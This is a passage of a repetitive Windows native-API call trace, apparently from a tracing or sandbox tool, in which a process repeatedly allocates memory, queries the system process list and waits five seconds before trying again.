Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.276] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.290] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.303] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.372] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.382] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.394] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.412] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.431] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.451] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.481] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) 